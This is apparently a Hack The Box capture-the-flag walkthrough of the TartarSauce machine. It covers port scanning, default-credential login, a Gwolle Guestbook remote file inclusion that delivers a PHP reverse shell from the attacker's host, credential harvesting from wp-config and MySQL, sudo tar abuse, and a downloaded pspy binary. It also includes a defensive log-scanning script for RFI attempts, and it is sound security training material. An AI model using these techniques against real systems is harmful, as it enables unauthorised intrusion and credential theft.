#hackthebox #medium #linux
# Information Gathering - Nmap
I scanned all 65,535 TCP ports and discovered only one port opened: port 80.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-05 01:03 UTC
Nmap scan report for 10.10.10.88
Host is up (0.060s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 16.90 seconds
```
Then I scanned the port again, this time with the `-sCV` option for more information.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-05 01:04 UTC
Nmap scan report for 10.10.10.88
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds
```
Lastly, I scanned the top 10 UDP ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-05 01:05 UTC
Nmap scan report for 10.10.10.88
Host is up (0.048s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
161/udp closed snmp
445/udp open|filtered microsoft-ds
631/udp open|filtered ipp
1434/udp closed ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 6.40 seconds
```
---
# Enumeration
##### HTTP - TCP 80
The landing page of the website on port 80 looks like the following: a very cool image of Tartar sauce made of random strings.
![[Pasted image 20250804200639.png]]
`Gobuster` found only one directory, `/webservices`.
```bash
gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.88
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/webservices (Status: 301) [Size: 316] [--> http://10.10.10.88/webservices/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
```
`/webservices/wp` appears to be a site made with `Wordpress`, using the `Voce` theme.
![[Pasted image 20250804201915.png]]
I clicked on `Test blog` and it navigated me to `tartarsauce.htb/webservices/wp`.
![[Pasted image 20250804202006.png]]
I added `tartarsauce.htb` in `/etc/hosts` file.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo "10.10.10.88 tartarsauce.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.10.88 tartarsauce.htb
```
As the Nmap output showed, there are 5 entries under `/robots.txt`, but I was able to access only `/webservices/monstra-3.0.4`.
![[Pasted image 20250804203057.png]]
The `/webservices/monstra-3.0.4` page looks like this. It is built with `Monstra`, a CMS.
![[Pasted image 20250804203127.png]]
Most of the links on the page are unavailable and just led me to `Not Found` pages. However, I found that the `/admin` page has a login form.
![[Pasted image 20250804203557.png]]
I tried the very typical default credentials `admin:admin` and, to my surprise, I got in!
![[Pasted image 20250804203735.png]]
Apparently `Monstra v3.0.4` has several known vulnerabilities. Since we found a valid set of user credentials, we can attempt the `RCE (Authenticated)` exploit.
![[Pasted image 20250804203430.png]]
# Initial Access - shell as `www-data`
I tried almost every exploit out there for `Monstra CMS v3.0.4`, but none of them worked, so I went back to the `/wp` page and started enumerating for `Wordpress` vulnerabilities.
Even `wpscan` was giving me a hard time: although I had just updated it, it failed to enumerate any plugins.
Then I added the `--plugins-detection aggressive` mode and it finally returned something.
`wpscan --url http://10.10.10.88/webservices/wp --enumerate p,t,u --plugins-detection aggressive`
```bash
[i] Plugin(s) Identified:
[+] akismet
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
| Last Updated: 2025-07-15T18:17:00.000Z
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.5
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/, status: 200
|
| Version: 4.0.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
[+] gwolle-gb
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
| Last Updated: 2025-06-23T16:09:00.000Z
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
| [!] The version is out of date, the latest version is 4.9.3
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200
|
| Version: 2.3.10 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
[+] Enumerating Most Popular Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:04 <==========================================================> (400 / 400) 100.00% Time: 00:00:04
```
The `readme.txt` file under the `gwolle-gb` plugin has a memo. Apparently the real version of this plugin is `1.5.3`.
![[Pasted image 20250804220843.png]]
`searchsploit` lists a known vulnerability for `Gwolle Guestbook 1.5.3`.
![[Pasted image 20250804220923.png]]
This PoC has a very detailed explanation of how this vulnerability can be exploited.
![[Pasted image 20250804221124.png]]
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ mv php-reverse-shell.php wp-load.php
```
1 - An HTTP server on my Kali box hosting the payload named `wp-load.php`.
2 - A GET request to the vulnerable endpoint, which grabs the payload from pane 1, includes it, and finally triggers a reverse shell.
3 - A listener for the reverse shell connection.
![[Pasted image 20250804222018.png]]
Finally I got my initial access as `www-data`.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.88] 37142
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
23:19:11 up 2:22, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```
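From the defender's side, the request in pane 2 leaves a clear trace in the web server's access log: a query parameter whose value is a full URL pointing at the attacker's staging host. The following Python is an added example (not code from this writeup or from the Gwolle plugin) that flags such remote-include attempts over constructed Apache log lines; the endpoint `example.php` and the parameter `path` are placeholders, not the real vulnerable endpoint.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
# A parameter value that is itself an absolute URL is the RFI tell-tale.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines: a normal visit, two include attempts (one of them
# percent-encoded) and a harmless parameter. Endpoint and param are placeholders.
SAMPLE_LOG = """\
10.10.14.14 - - [05/Aug/2025:23:18:40 +0000] "GET /webservices/wp/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.14 - - [05/Aug/2025:23:19:02 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/example.php?path=http://10.10.14.14:8888/ HTTP/1.1" 200 312 "-" "curl/8.5.0"
10.10.14.14 - - [05/Aug/2025:23:19:05 +0000] "GET /webservices/wp/index.php?p=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.10.14.14 - - [05/Aug/2025:23:19:09 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/example.php?path=http%3A%2F%2F10.10.14.14%3A8888%2F HTTP/1.1" 200 312 "-" "curl/8.5.0"
"""

def find_remote_includes(lines):
    """Return one dict per request whose query string carries a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip rather than crash
        target = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so an encoded http%3A%2F%2F is caught too.
        for param, value in parse_qsl(target.query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append({
                    "src": m.group("src"),
                    "time": m.group("ts"),
                    "path": target.path,
                    "param": param,
                    "include_url": value,
                    # host:port the victim would fetch the payload from
                    "staging_host": urlsplit(value).netloc,
                    "status": int(m.group("status")),
                })
    return hits

def staging_hosts(lines):
    """Distinct attacker-controlled hosts seen in include attempts (IoCs)."""
    return sorted({h["staging_host"] for h in find_remote_includes(lines)})

if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG.splitlines()):
        print(f'{hit["time"]} {hit["src"]} {hit["path"]} {hit["param"]}={hit["include_url"]}')
    print("staging hosts:", staging_hosts(SAMPLE_LOG.splitlines()))
```

On a real server the same function runs over `/var/log/apache2/access.log`; a hit whose `staging_host` is not one of your own systems is worth an immediate look.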
# Privilege Escalation - Shell as `onuma`
Since it's a web server running `Wordpress CMS`, the first file I searched for was `wp-config.php`. Inside the file, I found a set of `MySQL` credentials.
`wpuser:w0rdpr3$d@t@b@$3@cc3$`
![[Pasted image 20250804222717.png]]
The `/etc/passwd` file confirms there is a `mysql` service user.
![[Pasted image 20250804223046.png]]
I connected to MySQL.
```bash
mysql -u wpuser -p
Enter password: w0rdpr3$d@t@b@$3@cc3$
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 147
Server version: 5.7.22-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
```
The `wp_users` table in the `wp` database reveals the `wpadmin` credentials.
`wpadmin:$P$BBU0yjydBz9THONExe2kPEsvtjStGe1`
![[Pasted image 20250804223859.png]]
The hash type is obvious, but I still looked it up on `hashcat`'s example-hashes page.
Now that I know which mode to use, I'm going to crack it with hashcat.
![[Pasted image 20250804224340.png]]
However, `hashcat` took a long time to crack it, which strongly indicates that this might not be the right approach to solve the box.
Back in the reverse shell, I ran `sudo -l` and, surprisingly, this user can run `/bin/tar` as `onuma`.
```bash
www-data@TartarSauce:/var/www/html/webservices/wp$ sudo -l
sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
www-data@TartarSauce:/var/www/html/webservices/wp$
```
I referred to `GTFOBins` for the following command, but don't forget you have to run `sudo` as `onuma` (`sudo -u onuma`), otherwise it won't work.
![[Pasted image 20250804230542.png]]
# Privilege Escalation - Shell as `root`
I found `user.txt` in `/home/onuma`.
```bash
onuma@TartarSauce:~$ cat user.txt
3c2...
```
```bash
onuma@TartarSauce:~$ ls -l
total 4
lrwxrwxrwx 1 root root 9 Feb 17 2018 shadow_bkp -> /dev/null
-r-------- 1 onuma onuma 33 Aug 4 21:00 user.txt
```
`uname -m` tells us that this is a 32-bit system.
```bash
onuma@TartarSauce:/$ uname -m
i686
```
I transferred `pspy32` from my Kali box to the remote shell.
```bash
onuma@TartarSauce:/tmp$ wget http://10.10.14.14:8888/pspy32 -O pspy32
--2025-08-05 00:33:51--
Connecting to 10.10.14.14:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2940928 (2.8M) [application/octet-stream]
Saving to: 'pspy32'
pspy32 100%[===================>] 2.80M 5.05MB/s in 0.6s
2025-08-05 00:33:52 (5.05 MB/s) - 'pspy32' saved [2940928/2940928]
onuma@TartarSauce:/tmp$ ls
pspy32
systemd-private-e8bba42ab2844d8bb62469a43aa6fb48-systemd-timesyncd.service-0tmmxl
vmware-root
```
After a few minutes, pspy picked up the `/bin/bash /usr/sbin/backuperer` process many times.
![[Pasted image 20250804234128.png]]
The file's permissions are as follows:
```bash
onuma@TartarSauce:/$ ls -l /usr/sbin/backuperer
-rwxr-xr-x 1 root root 1701 Feb 21 2018 /usr/sbin/backuperer
```
The code inside the file:
```bash
cat /usr/sbin/backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf "-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf "$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf "$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
```
I honestly had no idea how to approach this box from this point, so I referred to `0xdf`'s [writeup](https://0xdf.gitlab.io/2018/10/20/htb-tartarsauce.html). As always, he breaks down each step in as much detail as possible. This box was very stressful lol. However, it really tested my limits and made me go above and beyond. I'll come back to this box in a few months, and I hope to be more successful at solving it by then.